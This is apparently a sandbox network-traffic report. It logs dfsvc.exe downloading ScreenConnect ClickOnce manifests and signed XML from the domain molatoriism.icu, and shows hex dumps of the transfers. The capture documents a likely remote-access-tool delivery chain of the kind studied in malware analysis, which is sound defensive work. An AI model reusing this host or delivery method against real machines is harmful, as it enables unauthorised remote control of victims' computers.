                                                                                                                                                                              2024-11-07 17:04:20 UTC563INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                                                                              2024-11-07 17:04:20 UTC1369INData Raw: 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 63 6c 69 63 6b 6f 6e 63 65 2e 76 32 22 3e 0d 0a 20 20 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 43 6c 69 65 6e 74 2e 61 70 70 6c 69 63 61 74 69 6f 6e 22 20 76 65 72 73 69 6f 6e 3d 22 32 34 2e 32 2e 31 30 2e 38 39 39 31 22 20 70 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 22 32 35 62 30 66 62 62 36 65 66 37 65 62 30 39 34 22 20 6c 61 6e 67 75 61 67 65 3d 22 6e 65 75 74 72 61 6c 22 20 70 72 6f 63 65 73 73 6f 72 41 72 63 68 69 74 65 63 74 75 72 65 3d 22 6d 73 69 6c 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 2f 3e 0d 0a 20 20 3c 64 65 73 63 72
                                                                                                                                                                              Data Ascii: microsoft-com:clickonce.v2"> <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" /> <descr
                                                                                                                                                                              2024-11-07 17:04:20 UTC1369INData Raw: 74 77 69 73 65 2c 20 4c 4c 43 26 71 75 6f 74 3b 2c 20 4c 3d 54 61 6d 70 61 2c 20 53 3d 46 6c 6f 72 69 64 61 2c 20 43 3d 55 53 22 20 69 73 73 75 65 72 4b 65 79 48 61 73 68 3d 22 36 38 33 37 65 30 65 62 62 36 33 62 66 38 35 66 31 31 38 36 66 62 66 65 36 31 37 62 30 38 38 38 36 35 66 34 34 65 34 32 22 20 2f 3e 3c 53 69 67 6e 61 74 75 72 65 20 49 64 3d 22 53 74 72 6f 6e 67 4e 61 6d 65 53 69 67 6e 61 74 75 72 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 22 3e 3c 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 43 61 6e 6f 6e 69 63 61 6c 69 7a 61 74 69 6f 6e 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 31 30 2f
                                                                                                                                                                              Data Ascii: twise, LLC&quot;, L=Tampa, S=Florida, C=US" issuerKeyHash="6837e0ebb63bf85f1186fbfe617b088865f44e42" /><Signature Id="StrongNameSignature" xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo><CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/
                                                                                                                                                                              2024-11-07 17:04:20 UTC1369INData Raw: 41 74 7a 41 71 44 54 51 68 30 3d 3c 2f 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 3c 4b 65 79 49 6e 66 6f 20 49 64 3d 22 53 74 72 6f 6e 67 4e 61 6d 65 4b 65 79 49 6e 66 6f 22 3e 3c 4b 65 79 56 61 6c 75 65 3e 3c 52 53 41 4b 65 79 56 61 6c 75 65 3e 3c 4d 6f 64 75 6c 75 73 3e 37 45 69 59 4a 74 43 4e 4c 47 33 69 47 7a 7a 54 5a 32 32 78 34 4f 55 4d 73 66 39 31 2f 31 5a 4f 6c 30 48 35 56 30 71 6a 5a 41 71 6f 4b 58 4b 55 6f 46 74 4e 74 6f 71 39 42 32 43 32 73 46 74 51 7a 70 4c 2f 51 71 54 6a 6b 4c 35 33 61 6b 50 70 6c 68 78 79 4c 32 73 36 54 56 79 49 43 38 78 71 59 62 51 43 62 35 45 33 30 32 73 72 66 70 75 47 42 56 68 32 75 66 71 47 44 62 79 78 5a 50 35 2f 53 31 75 64 35 48 6d 61 35 4f 41 74 77 66 43 2b 34 42 35 64 41 79 6b 7a 6f 6f 4a 7a 69 50 6a 62 43 30 67
                                                                                                                                                                              Data Ascii: AtzAqDTQh0=</SignatureValue><KeyInfo Id="StrongNameKeyInfo"><KeyValue><RSAKeyValue><Modulus>7EiYJtCNLG3iGzzTZ22x4OUMsf91/1ZOl0H5V0qjZAqoKXKUoFtNtoq9B2C2sFtQzpL/QqTjkL53akPplhxyL2s6TVyIC8xqYbQCb5E302srfpuGBVh2ufqGDbyxZP5/S1ud5Hma5OAtwfC+4B5dAykzooJziPjbC0g
                                                                                                                                                                              2024-11-07 17:04:20 UTC1369INData Raw: 6e 69 66 65 73 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 3e 3c 61 73 3a 53 69 67 6e 65 64 42 79 20 2f 3e 3c 61 73 3a 41 75 74 68 65 6e 74 69 63 6f 64 65 50 75 62 6c 69 73 68 65 72 3e 3c 61 73 3a 58 35 30 39 53 75 62 6a 65 63 74 4e 61 6d 65 3e 43 4e 3d 22 43 6f 6e 6e 65 63 74 77 69 73 65 2c 20 4c 4c 43 22 2c 20 4f 3d 22 43 6f 6e 6e 65 63 74 77 69 73 65 2c 20 4c 4c 43 22 2c 20 4c 3d 54 61 6d 70 61 2c 20 53 3d 46 6c 6f 72 69 64 61 2c 20 43 3d 55 53 3c 2f 61 73 3a 58 35 30 39 53 75 62 6a 65 63 74 4e 61 6d 65 3e 3c 2f 61 73 3a 41 75 74 68 65 6e 74 69 63 6f 64 65 50 75 62 6c 69 73 68 65 72 3e 3c 2f 72 3a 67 72 61 6e 74 3e 3c 72 3a 69 73 73 75 65 72 3e 3c 53 69 67 6e 61 74 75 72 65 20 49 64 3d 22 41 75 74 68 65 6e 74 69 63 6f 64 65 53 69 67 6e 61 74 75 72 65 22 20 78
                                                                                                                                                                              Data Ascii: nifestInformation><as:SignedBy /><as:AuthenticodePublisher><as:X509SubjectName>CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US</as:X509SubjectName></as:AuthenticodePublisher></r:grant><r:issuer><Signature Id="AuthenticodeSignature" x
                                                                                                                                                                              2024-11-07 17:04:20 UTC1369INData Raw: 75 56 66 73 63 65 30 6d 64 58 6f 73 67 41 37 2b 31 36 39 73 46 67 44 66 6c 50 55 77 74 66 31 75 6f 47 45 4d 44 4d 54 31 57 4f 67 52 6e 62 6b 49 32 45 4a 6d 37 4e 2b 47 53 56 42 30 6d 45 45 71 56 32 39 76 54 64 4a 59 4b 2b 71 41 59 4b 6f 54 72 52 37 56 70 2f 46 4d 4a 4f 6d 66 53 73 59 77 72 47 4d 54 44 4b 72 72 48 64 61 56 34 71 35 4f 78 31 6a 6d 55 49 73 48 72 2f 4b 6b 67 3d 3c 2f 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 3c 4b 65 79 49 6e 66 6f 3e 3c 4b 65 79 56 61 6c 75 65 3e 3c 52 53 41 4b 65 79 56 61 6c 75 65 3e 3c 4d 6f 64 75 6c 75 73 3e 37 45 69 59 4a 74 43 4e 4c 47 33 69 47 7a 7a 54 5a 32 32 78 34 4f 55 4d 73 66 39 31 2f 31 5a 4f 6c 30 48 35 56 30 71 6a 5a 41 71 6f 4b 58 4b 55 6f 46 74 4e 74 6f 71 39 42 32 43 32 73 46 74 51 7a 70 4c 2f 51 71 54
                                                                                                                                                                              Data Ascii: uVfsce0mdXosgA7+169sFgDflPUwtf1uoGEMDMT1WOgRnbkI2EJm7N+GSVB0mEEqV29vTdJYK+qAYKoTrR7Vp/FMJOmfSsYwrGMTDKrrHdaV4q5Ox1jmUIsHr/Kkg=</SignatureValue><KeyInfo><KeyValue><RSAKeyValue><Modulus>7EiYJtCNLG3iGzzTZ22x4OUMsf91/1ZOl0H5V0qjZAqoKXKUoFtNtoq9B2C2sFtQzpL/QqT
                                                                                                                                                                              2024-11-07 17:04:20 UTC1369INData Raw: 38 41 4d 49 49 43 43 67 4b 43 41 67 45 41 37 45 69 59 4a 74 43 4e 4c 47 33 69 47 7a 7a 54 5a 32 32 78 34 4f 55 4d 73 66 39 31 2f 31 5a 4f 6c 30 48 35 56 30 71 6a 5a 41 71 6f 4b 58 4b 55 6f 46 74 4e 74 6f 71 39 42 32 43 32 73 46 74 51 7a 70 4c 2f 51 71 54 6a 6b 4c 35 33 61 6b 50 70 6c 68 78 79 4c 32 73 36 54 56 79 49 43 38 78 71 59 62 51 43 62 35 45 33 30 32 73 72 66 70 75 47 42 56 68 32 75 66 71 47 44 62 79 78 5a 50 35 2f 53 31 75 64 35 48 6d 61 35 4f 41 74 77 66 43 2b 34 42 35 64 41 79 6b 7a 6f 6f 4a 7a 69 50 6a 62 43 30 67 75 64 73 52 42 73 62 31 51 6b 4a 37 79 41 6a 34 66 74 69 47 57 79 5a 54 4f 42 53 4a 6d 73 6f 7a 59 6b 6c 50 6d 51 57 42 45 45 7a 45 35 64 6b 32 31 2f 45 56 77 4a 53 6c 54 61 2f 67 73 64 31 2b 65 79 42 2b 69 66 63 51 4a 55 77 4d 6c 39
                                                                                                                                                                              Data Ascii: 8AMIICCgKCAgEA7EiYJtCNLG3iGzzTZ22x4OUMsf91/1ZOl0H5V0qjZAqoKXKUoFtNtoq9B2C2sFtQzpL/QqTjkL53akPplhxyL2s6TVyIC8xqYbQCb5E302srfpuGBVh2ufqGDbyxZP5/S1ud5Hma5OAtwfC+4B5dAykzooJziPjbC0gudsRBsb1QkJ7yAj4ftiGWyZTOBSJmsozYklPmQWBEEzE5dk21/EVwJSlTa/gsd1+eyB+ifcQJUwMl9
                                                                                                                                                                              2024-11-07 17:04:20 UTC1369INData Raw: 79 4d 55 4e 42 4d 53 35 6a 63 6e 51 77 44 41 59 44 56 52 30 54 41 51 48 2f 42 41 49 77 41 44 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 73 46 41 41 4f 43 41 67 45 41 43 74 65 66 41 4d 39 4a 68 49 5a 4d 69 59 48 73 7a 6f 63 59 71 6f 64 57 52 2f 61 6e 52 67 6a 4a 61 4f 46 6c 61 4d 65 71 6e 58 45 65 31 7a 51 57 64 67 4f 41 5a 2f 41 54 4d 4d 6b 57 49 62 4a 36 4b 6f 69 55 78 42 43 4d 4a 6f 46 69 6f 78 38 54 2b 58 56 36 66 57 75 7a 78 76 47 62 38 6e 77 36 4b 59 6c 74 63 53 32 46 68 7a 59 6e 32 43 66 4e 5a 48 46 32 46 45 54 36 76 78 30 78 36 51 50 33 6b 52 51 38 57 30 7a 6c 35 30 52 4b 72 4c 6f 32 31 31 6d 75 75 6a 42 70 30 5a 55 69 5a 31 58 4c 78 6e 57 71 64 48 39 33 57 57 78 54 79 57 34 49 50 45 57 37 6f 6b 52 35 31 6f 52 65 36 70 38 72 4b 4c 6f 70 74 4e
                                                                                                                                                                              Data Ascii: yMUNBMS5jcnQwDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQsFAAOCAgEACtefAM9JhIZMiYHszocYqodWR/anRgjJaOFlaMeqnXEe1zQWdgOAZ/ATMMkWIbJ6KoiUxBCMJoFiox8T+XV6fWuzxvGb8nw6KYltcS2FhzYn2CfNZHF2FET6vx0x6QP3kRQ8W0zl50RKrLo211muujBp0ZUiZ1XLxnWqdH93WWxTyW4IPEW7okR51oRe6p8rKLoptN
                                                                                                                                                                              2024-11-07 17:04:20 UTC1369INData Raw: 59 63 39 55 52 6e 6f 6b 43 46 34 52 53 36 68 6e 79 7a 68 47 4d 49 61 7a 4d 58 75 6b 30 6c 77 51 6a 4b 50 2b 38 62 71 48 50 4e 6c 61 4a 47 69 54 55 79 43 45 55 68 53 61 4e 34 51 76 52 52 58 58 65 67 59 45 32 58 46 66 37 4a 50 68 53 78 49 70 46 61 45 4e 64 62 35 4c 70 79 71 41 42 58 52 4e 2f 34 61 42 70 54 43 66 4d 6a 71 47 7a 4c 6d 79 73 4c 30 70 36 4d 44 44 6e 53 6c 72 7a 6d 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d
                                                                                                                                                                              Data Ascii: Yc9URnokCF4RS6hnyzhGMIazMXuk0lwQjKP+8bqHPNlaJGiTUyCEUhSaN4QvRRXXegYE2XFf7JPhSxIpFaENdb5LpyqABXRN/4aBpTCfMjqGzLmysL0p6MDDnSlrzm2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipm
                                                                                                                                                                              2024-11-07 17:04:20 UTC1369INData Raw: 6b 34 56 66 63 33 69 6f 73 4a 6f 63 73 4c 36 54 45 61 2f 79 34 5a 58 44 6c 78 34 62 36 63 70 77 6f 47 31 69 5a 6e 74 35 4c 6d 54 6c 2f 65 65 71 78 4a 7a 79 36 6b 64 4a 4b 74 32 7a 79 6b 6e 49 59 66 34 38 46 57 47 79 73 6a 2f 34 2b 31 36 6f 68 37 63 47 76 6d 6f 4c 72 39 4f 6a 39 46 70 73 54 6f 46 70 46 53 69 30 48 41 53 49 52 4c 6c 6b 32 72 52 45 44 6a 6a 66 41 56 4b 4d 37 74 38 52 68 57 42 79 6f 76 45 4d 51 4d 43 47 51 38 4d 34 2b 75 4b 49 77 38 79 34 2b 49 43 77 32 2f 4f 2f 54 4f 48 6e 75 4f 37 37 58 72 79 37 66 77 64 78 50 6d 35 79 67 2f 72 42 4b 75 70 53 38 69 62 45 48 35 67 6c 77 56 5a 73 78 73 44 73 72 46 68 73 50 32 4a 6a 4d 4d 42 30 75 67 30 77 63 43 61 6d 70 41 4d 45 68 4c 4e 4b 68 52 49 4c 75 74 47 34 55 49 34 6c 6b 4e 62 63 6f 46 55 43 76 71 53
                                                                                                                                                                              Data Ascii: k4Vfc3iosJocsL6TEa/y4ZXDlx4b6cpwoG1iZnt5LmTl/eeqxJzy6kdJKt2zyknIYf48FWGysj/4+16oh7cGvmoLr9Oj9FpsToFpFSi0HASIRLlk2rREDjjfAVKM7t8RhWByovEMQMCGQ8M4+uKIw8y4+ICw2/O/TOHnuO77Xry7fwdxPm5yg/rBKupS8ibEH5glwVZsxsDsrFhsP2JjMMB0ug0wcCampAMEhLNKhRILutG4UI4lkNbcoFUCvqS


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.549708172.67.182.2144437120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-07 17:04:22 UTC97OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-11-07 17:04:22 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:22 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RixdxCcySwBv0%2Fy2rBSdQwiAMm3SPK3CIj7rboIVSGWp%2BxacbDO0WH05MWG1rP7xlhuQedhmp2ouF574zONIq2sdOyqRVRJW4JsCP7Sx0JLqzc3BtN3ZtgVhVzqnV%2BpxxLs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee6ebbcd9b789-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1335&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=712&delivery_rate=2182366&cwnd=39&unsent_bytes=0&cid=37416cbe6ba37539&ts=608&x=0"
                                                                                                                                                                              2024-11-07 17:04:22 UTC599INData Raw: 34 30 30 30 0d 0a ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e
                                                                                                                                                                              Data Ascii: 4000<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmln
                                                                                                                                                                              2024-11-07 17:04:22 UTC1369INData Raw: 74 2e 57 69 6e 64 6f 77 73 43 6c 69 65 6e 74 2e 65 78 65 22 20 76 65 72 73 69 6f 6e 3d 22 32 34 2e 32 2e 31 30 2e 38 39 39 31 22 20 70 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 22 32 35 62 30 66 62 62 36 65 66 37 65 62 30 39 34 22 20 6c 61 6e 67 75 61 67 65 3d 22 6e 65 75 74 72 61 6c 22 20 70 72 6f 63 65 73 73 6f 72 41 72 63 68 69 74 65 63 74 75 72 65 3d 22 6d 73 69 6c 22 20 74 79 70 65 3d 22 77 69 6e 33 32 22 20 2f 3e 0d 0a 20 20 3c 61 70 70 6c 69 63 61 74 69 6f 6e 20 2f 3e 0d 0a 20 20 3c 65 6e 74 72 79 50 6f 69 6e 74 3e 0d 0a 20 20 20 20 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 43 6c 69 65 6e 74 22 20 76 65 72 73 69 6f 6e 3d 22 32 34 2e 32 2e 31 30 2e 38 39 39
                                                                                                                                                                              Data Ascii: t.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" /> <application /> <entryPoint> <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.899
                                                                                                                                                                              2024-11-07 17:04:22 UTC1369INData Raw: 70 65 6e 64 65 6e 63 79 3e 0d 0a 20 20 3c 64 65 70 65 6e 64 65 6e 63 79 3e 0d 0a 20 20 20 20 3c 64 65 70 65 6e 64 65 6e 74 41 73 73 65 6d 62 6c 79 20 64 65 70 65 6e 64 65 6e 63 79 54 79 70 65 3d 22 69 6e 73 74 61 6c 6c 22 20 61 6c 6c 6f 77 44 65 6c 61 79 65 64 42 69 6e 64 69 6e 67 3d 22 74 72 75 65 22 20 63 6f 64 65 62 61 73 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 43 6c 69 65 6e 74 2e 64 6c 6c 22 20 73 69 7a 65 3d 22 31 39 37 31 32 30 22 3e 0d 0a 20 20 20 20 20 20 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 43 6c 69 65 6e 74 22 20 76 65 72 73 69 6f 6e 3d 22 32 34 2e 32 2e 31 30 2e 38 39 39 31 22 20 70 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 22 34 42 31 34 43 30 31 35 43 38
                                                                                                                                                                              Data Ascii: pendency> <dependency> <dependentAssembly dependencyType="install" allowDelayedBinding="true" codebase="ScreenConnect.Client.dll" size="197120"> <assemblyIdentity name="ScreenConnect.Client" version="24.2.10.8991" publicKeyToken="4B14C015C8
                                                                                                                                                                              2024-11-07 17:04:22 UTC1369INData Raw: 3c 2f 64 65 70 65 6e 64 65 6e 63 79 3e 0d 0a 20 20 3c 64 65 70 65 6e 64 65 6e 63 79 3e 0d 0a 20 20 20 20 3c 64 65 70 65 6e 64 65 6e 74 41 73 73 65 6d 62 6c 79 20 64 65 70 65 6e 64 65 6e 63 79 54 79 70 65 3d 22 69 6e 73 74 61 6c 6c 22 20 61 6c 6c 6f 77 44 65 6c 61 79 65 64 42 69 6e 64 69 6e 67 3d 22 74 72 75 65 22 20 63 6f 64 65 62 61 73 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 43 6f 72 65 2e 64 6c 6c 22 20 73 69 7a 65 3d 22 35 34 38 38 36 34 22 3e 0d 0a 20 20 20 20 20 20 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 43 6f 72 65 22 20 76 65 72 73 69 6f 6e 3d 22 32 34 2e 32 2e 31 30 2e 38 39 39 31 22 20 70 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 22 34 42 31 34 43 30 31 35 43 38
                                                                                                                                                                              Data Ascii: </dependency> <dependency> <dependentAssembly dependencyType="install" allowDelayedBinding="true" codebase="ScreenConnect.Core.dll" size="548864"> <assemblyIdentity name="ScreenConnect.Core" version="24.2.10.8991" publicKeyToken="4B14C015C8
                                                                                                                                                                              2024-11-07 17:04:22 UTC1369INData Raw: 63 79 3e 0d 0a 20 20 3c 64 65 70 65 6e 64 65 6e 63 79 3e 0d 0a 20 20 20 20 3c 64 65 70 65 6e 64 65 6e 74 41 73 73 65 6d 62 6c 79 20 64 65 70 65 6e 64 65 6e 63 79 54 79 70 65 3d 22 69 6e 73 74 61 6c 6c 22 20 61 6c 6c 6f 77 44 65 6c 61 79 65 64 42 69 6e 64 69 6e 67 3d 22 74 72 75 65 22 20 63 6f 64 65 62 61 73 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 43 6c 69 65 6e 74 2e 65 78 65 22 20 73 69 7a 65 3d 22 36 30 31 33 37 36 22 3e 0d 0a 20 20 20 20 20 20 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 43 6c 69 65 6e 74 22 20 76 65 72 73 69 6f 6e 3d 22 32 34 2e 32 2e 31 30 2e 38 39 39 31 22 20 70 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 22 34 42
                                                                                                                                                                              Data Ascii: cy> <dependency> <dependentAssembly dependencyType="install" allowDelayedBinding="true" codebase="ScreenConnect.WindowsClient.exe" size="601376"> <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B
                                                                                                                                                                              2024-11-07 17:04:22 UTC1369INData Raw: 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 73 68 61 31 22 20 2f 3e 0d 0a 20 20 20 20 20 20 3c 64 73 69 67 3a 44 69 67 65 73 74 56 61 6c 75 65 3e 4f 4f 71 32 36 64 6d 62 58 4b 37 73 6c 77 4f 49 54 53 57 2b 6a 59 45 57 49 4b 6b 3d 3c 2f 64 73 69 67 3a 44 69 67 65 73 74 56 61 6c 75 65 3e 0d 0a 20 20 20 20 3c 2f 68 61 73 68 3e 0d 0a 20 20 3c 2f 66 69 6c 65 3e 0d 0a 20 20 3c 66 69 6c 65 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 2e 65 78 65 2e 63 6f 6e 66 69 67 22 20 73 69 7a 65 3d 22 32 36 36 22 3e 0d 0a 20 20 20 20 3c 68 61 73 68 3e 0d 0a 20 20 20 20 20 20 3c 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 73 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 73 69 67 3a 54 72 61 6e 73 66 6f
                                                                                                                                                                              Data Ascii: 000/09/xmldsig#sha1" /> <dsig:DigestValue>OOq26dmbXK7slwOITSW+jYEWIKk=</dsig:DigestValue> </hash> </file> <file name="ScreenConnect.WindowsBackstageShell.exe.config" size="266"> <hash> <dsig:Transforms> <dsig:Transfo
                                                                                                                                                                              2024-11-07 17:04:22 UTC1369INData Raw: 78 65 2e 63 6f 6e 66 69 67 22 20 73 69 7a 65 3d 22 32 36 36 22 3e 0d 0a 20 20 20 20 3c 68 61 73 68 3e 0d 0a 20 20 20 20 20 20 3c 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 73 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 20 41 6c 67 6f 72 69 74 68 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 48 61 73 68 54 72 61 6e 73 66 6f 72 6d 73 2e 49 64 65 6e 74 69 74 79 22 20 2f 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 73 3e 0d 0a 20 20 20 20 20 20 3c 64 73 69 67 3a 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 73 68 61 31 22 20 2f 3e
                                                                                                                                                                              Data Ascii: xe.config" size="266"> <hash> <dsig:Transforms> <dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" /> </dsig:Transforms> <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" />
